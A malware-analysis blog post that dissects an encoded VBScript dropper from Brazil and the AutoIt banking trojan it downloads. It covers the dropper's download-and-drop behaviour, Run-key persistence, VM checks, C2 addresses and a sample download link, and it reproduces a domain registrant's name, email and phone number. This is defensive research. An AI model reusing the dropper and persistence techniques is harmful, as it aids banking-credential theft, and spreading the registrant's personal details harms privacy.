MalwareMustDie (MMD) today is having the third anniversary. due to this occasion, I wrote this post as the anniversary celebration :) The point is to introduce some methodology in dissecting obfuscated script malware using the real life sample of VBE encoded case with multiple obfuscation. Why I pick this VBE is because the recent raise of the visual basic scripted malware, as in its stand alone VBE, in attached macro of Microsoft Office documents too, so hopefully this writing can share some idea to those who want to know more in how we used to dissect them in MMD. Another reason is to introduce many tools for practical malware analysis that can be performed by everyone who want to start to learn. It's not that difficult, so let's learn it together!
A friend was sending us a VB encoded script (with thank's), he sent me a lot of good samples and I really appreciated. The file named "ContratoAssinar.vbe (4bb9a041ab9cdd8398f95c0dd8a364b0)" and I find it very interesting, so I think I'd better to make some notes here about the way I dissolve it for others who may handle same threat.
The origin of the threat is from South America (to be precise, Brazil), The file looks like coming from an attachment of malvertisement email campaign of the malware. The file name itself is quite popular, with a bit of net surfing will give you good information about the campaign of this malware.
VBE malware script
I tend to use the script provided by the vendor for these purpose so I used this script-->[link] to decode it (the instruction is in that page, self explanatory) and it was resulted into another partial-obfuscated script as you can see the whole data in the below image:
You will see some area in the above code that I separated them into colors:
The yellow area is the part where this script is to be assured to execute in the right system command & path/file name, it was started in the first line a SUB name that execution the latest part in the overall script.
The red part is the data area where the actual malware script command for the next level is obfuscated, following the red arrow will lead you to the blue area of logic where the data to be final-deobfuscated in the below series of deobfuscation commands.
Orange color part is the part where deobfuscated commands to be executed, and following the blue arrow can lead you to the actual malicious mysterious strings to be executed by the obfuscated malware script.
To understand the flow of obfuscation in several language of programming that I faced so far in MalwareMustDie and facing to obfuscation I tend to discipline myself to follow my own committed rules as per shared below:
1. Make the code to be simplified, beautified, make it easy to stare (I mean..to read)
2. Break the codes into pieces, comment them, make sure you know how each component works.
3. To securely simulate the code to debug. Use compiler/interpreter if possible, if not..use our brain for it, make some notes, in this level most of the time in heavy obfuscated challenge I must go back to point 1. again, but so be it.
4. Do not get frustrated, enjoy the cracking, it will all be solved in time, believe it! When you are in rush or in pressure your brain can not focus to the cracking and if you push into it your work will not effective and many miss will occur.
5. Write it, don't expect your brain to memorize every work result you do, make it searchable for yourself to be used for later reference.
In this case the memo of the above rule and process applied to this sample is as per seen in this pastebin--> [link]
Noted: I tweaked some code so you won't run it in harmful way if you just copy paste and run it.
Below is the explanation of the paste and the next steps:
There are two environment that the gods of Windows provide us to deal with visual basic scripting in any machine with wscript.exe and cscript.exe, I use wscript.exe only for checking the break point using Wscript.Echo command to check the variable result. In the paste you will see some of simple breakpoints to check the vital values of the script. As per seen in the below screenshots:
After the breakpoint's debugging lead you to the correct result you would want to copy paste them to a text, in this point you can run the script with the cscript.exe to get the text result in the console as per snapshot below:
The full code is beautified as per below:
Again we still have to deal with the visual basic script, but all of the code are readable. It's obviously it downloads the zip file from the internet and save it to a certain folder and extracted into %appdata%+random folder name into random filename +.exe extension. The script is neat, it has the originally coded randomize functions and original coded SUBs for downloading the remote file from hard coded IP address of 126.96.36.199 using microsoft.xmlhttp and adodb.stream objects.
To be noted, our payload is a zip file contains the text file that can be viewed in Virus Total in here-->[link] or can be viewed by the picture below:
Isn't it amazing to see that in this era there is still a crook who want victims to download 6Mb of malware unrecognized? Well, here is one of them..
The IP that serves this malware is located in Germany:
"ip": "188.8.131.52", "hostname": "b9.globalplex.us", "city": null, "country": "DE", "loc": "51.0000,9.0000", "org": "AS12586 GHOSTnet GmbH"
The AutoIt PE "Banco" banking trojan
A quick check will confirm the badness of this "text" file which is actually is a PE:
I love to use pyew since the day we start MalwareMustDie and thank's to Mr.Joxean Koret to develop it, I just want him to know that I use it all along for three years non stop :-) along with many shell tools I use. It is VERY useful for the UNIX shell that can not be used to compile full binary to run other binary analysis tools since it runs on python. And it has many useful disassembler functions too. Here's the snip of the payload in this story:
In order to find the best way to do it, static analysis is a must. The pescanner is assuring many details for the further reversing purpose:
Just to make sure it's not an false detection I tend to re-check it with the other beloved tool I use, you all know what it is:
For friends with the Wndows OS environment, don't worry! PEStudio can statically analyze this malware very good, take a look of how many indicator was raised an dthe detection of the AutoIt overlay below:
OK, to reverse it, since this is the AutoIt malware, I just prefer to decompile it for the analysis. I use this good tool for it -->[link]
The result is as below, it is bringing us to "another level" of obfuscation :-)
You can see there some DLL struct scripted for the usage malicious calls of and some PE binaries blobs ( which those are there to be used for the x64 or x32 OS process injection). Please try to decode the AutoIt script by yourself and trail its variable one by one. It's good to see a readable code is it?
The other activities that can be read plainly from these codes are the sleep time taken after executed (see the beautified source code), the detection of the VM (access to \VBoxMiniRdrDN), and many more details, all are executed from this AutoIt script to system calls.
Other important point of this malware infection is the registry autostart and some file view windows explorer setting in registry (I dunno what this is for..but there's no good in it).
HKEY_USERS\Software\Microsoft\Windows\CurrentVersion\Run HKEY_USERS\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced EnableBalloonTips
I will add the malicious calls coded in the script one by one to this post as a additional later on!
The malware is contacting the remote host as CNC in Brazil with IP 184.108.40.206 and sending CNC poke data via a HTTP/1.1 POST, that IP is having a very bad reputation IP-->[link]:below is the evidence:
Lookup result for the domain called:
;; ANSWER SECTION: hostbemore.com. 1800 IN A 220.127.116.11 ;; AUTHORITY SECTION: hostbemore.com. 3600 IN NS ns1.dominios.uol.com.br. hostbemore.com. 3600 IN NS ns2.dominios.uol.com.br. hostbemore.com. 3600 IN NS ns3.dominios.uol.com.br. ;; ADDITIONAL SECTION: ns1.dominios.uol.com.br. 3275 IN A 18.104.22.168 ns2.dominios.uol.com.br. 3275 IN A 22.214.171.124 ns3.dominios.uol.com.br. 3275 IN A 126.96.36.199Ip address origin (GeoIP & ASN):
"ip": "188.8.131.52", "hostname": "No Hostname", "city": null, "country": "BR", "loc": "-23.5477,-46.6358", "org": "AS7162 Universo Online S.A."The domain is registered with an email contact of ARNALDOBALTAZAR@GMAIL.COM to ENOM.COM:
Domain Name: HOSTBEMORE.COM Registry Domain ID: 1895096489_DOMAIN_COM-VRSN Registrar WHOIS Server: whois.enom.com Registrar URL: www.enom.com Updated Date: 2015-07-07T05:57:31.00Z Creation Date: 2015-01-10T15:12:00.00Z Registrar Registration Expiration Date: 2016-01-10T15:12:00.00Z Registrar: ENOM, INC. Registrar IANA ID: 48 Registry Registrant ID: Registrant Name: "ARNALDO BALTAZAR NETO NETO" Registrant Organization: "SOUZACRUZFERRAGISTA" Registrant Street: "AV BELA VISTA2 Registrant City: "GOIANIA" Registrant State/Province: Registrant Postal Code: "74938110" Registrant Country: "BR" Registrant Phone: "+55.6198515323" Registrant Email: "ARNALDOBALTAZAR@GMAIL.COM"
Sample for analysis learning purposeIt's downloadable in a 7zip format from here -->[link]
Kudos the cool coders of great tools & OS we use:
Happy anniversary to MMD friends! Stay safe! #MalwareMustDie!